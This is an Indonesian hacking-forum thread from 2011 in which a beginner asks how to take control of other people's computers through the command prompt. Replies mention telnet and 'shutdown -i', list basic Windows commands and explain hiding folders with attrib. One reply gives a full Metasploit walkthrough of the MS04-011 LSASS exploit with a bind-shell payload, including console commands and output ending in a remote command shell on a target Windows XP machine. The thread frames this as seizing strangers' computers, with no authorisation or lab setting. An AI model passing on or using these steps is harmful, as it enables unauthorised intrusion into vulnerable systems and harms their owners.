Page 1 of 1

bagai mana caranya menggerakan komputer orang melalui CMD

PostPosted: Wed Mar 02, 2011 3:38 pm
by ch0c0 pahmen
saya pernah lihat teman saya, dia menggerakan komputernya memakai komputer orang laen
dia bisa menguasain sistem dengan bebas
saya hanya dapat melihat dia hanya menggunakan Common saja
dari situ lah saya ingin belajar unutk menjadi hacking

saya mohon respon dari para sesepu dan para newbie yang tahu cara eksekusinya.....
terimakasih

Re: bagai mana caranya menggerakan komputer orang melalui CM

PostPosted: Wed Mar 02, 2011 5:12 pm
by chevssites
mungkin coba pake
perintah seperti telnet
atoo shutdown -i

Re: bagai mana caranya menggerakan komputer orang melalui CM

PostPosted: Thu Mar 03, 2011 12:46 am
by badwolves1986
klo pake CMD ane kurang ngerti bang
tapi klo metasploit ngarti wkwk :D

Re: bagai mana caranya menggerakan komputer orang melalui CM

PostPosted: Fri Mar 18, 2011 12:41 pm
by nakmedan
kalo pke metasploit gmana tuh om....tolong pencerahaannya dong

Re: bagai mana caranya menggerakan komputer orang melalui CM

PostPosted: Tue Mar 22, 2011 5:03 pm
by Darkzzzz
Menggerakan Komputer?
Maksudnya apa ya?
Meremote?

Re: bagai mana caranya menggerakan komputer orang melalui CM

PostPosted: Tue Mar 22, 2011 6:27 pm
by j0ck3r
ch0c0 pahmen wrote:saya pernah lihat teman saya, dia menggerakan komputernya memakai komputer orang laen
dia bisa menguasain sistem dengan bebas
saya hanya dapat melihat dia hanya menggunakan Common saja
dari situ lah saya ingin belajar unutk menjadi hacking

saya mohon respon dari para sesepu dan para newbie yang tahu cara eksekusinya.....
terimakasih

apa mungkin dia mengakses telnet,setelah dia tahu password adminnya??

Re: bagai mana caranya menggerakan komputer orang melalui CM

PostPosted: Thu Mar 24, 2011 10:00 am
by kautzar
mungkin untuk pemula yang dasar2 dulu..monggo dicoba..comand prompt sederhana
net view : untuk melihat user yg aktif di jaringan
dir : melihat folder
ipcofig : melihat ip dll
trasert : melihat jalur jaringan
attrib :display or change file attribute

salah satu rumus untk menghiden file : ketik tempat partisi yg akan di hidden..
1 misal data berada di D.. ketik D: enter---
2 terus ketik cd spasi folder yang akan di hidden
3 kalau sukses akan muncul D:/Folder yang akan di hidden>
4 setelah itu ketik Attrib spasi +s spasi +h spasi /s spasi /d
5 folder akan hilang otomatis

Re: bagai mana caranya menggerakan komputer orang melalui CM

PostPosted: Thu Mar 24, 2011 2:27 pm
by j0ck3r
nakmedan wrote:kalo pke metasploit gmana tuh om....tolong pencerahaannya dong

cuman contoh lama,maaf kalau salah,silahkan gunakan metasploit versi terbaru :maaf: :maaf:
1. Jalanin programnya...
2. truz..teken tombol CTRL+O bwat masuk ke konsolnya..
3. maka akan muncul konsol spt ini

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ msf v3.1-release
+ -- --=[ 262 exploits - 117 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux

msf >

4. liat smua exploit yg ada
msf > show exploits

5. load modul exploit,kita gunain exploit lsass spt cara diatas

msf > use windows/smb/ms04_011_lsass

6. Tentukan sistem operasi target... misal target menggunakan XP

maka targetnya spt berikut

msf exploit(ms04_011_lsass) > set target 2

target => 2

7. Tampilin payloadnya apa aja yg ada..

msf exploit(ms04_011_lsass) > show payloads

8. karena qta mo msk k konsol, qta plh payload generic/shell_bind_tcp

msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp

payload => generic/shell_bind_tcp

9. Udah ntuh tentuin IP si target...misal ip si target 192.168.113.14

msf exploit(ms04_011_lsass) > set RHOST 192.168.113.14
RHOST => 192.168.113.14

10. Udah dech...tinggal jalanin perintah exploit...

msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:[email protected]_np:192.168.113.14[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:[email protected]_np:192.168.113.14[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444)
[*] The DCERPC service did not reply to our request

lihat di sana ada tulisan Command shell session 3 opened...ini menandakan qta sudah berhasil msk...dan shell qta di simpan di session 3.

11. Selanjutnya qta tampilin...isi session qta

msf exploit(ms04_011_lsass) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
3 Command shell 192.168.113.25:8471 -> 192.168.113.14:4444

12. Udah itu...kita masuk ke session 3 tersebut, untuk masuk ke konsol....

msf exploit(ms04_011_lsass) > sessions -i 3

[*] Starting interaction with 3...

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Re: bagai mana caranya menggerakan komputer orang melalui CM

PostPosted: Mon Dec 26, 2011 3:46 pm
by I_Free
To Bang Jocker:

Cara diatas berlaku ke IP static or IP Dynamic..?

Thanx... :)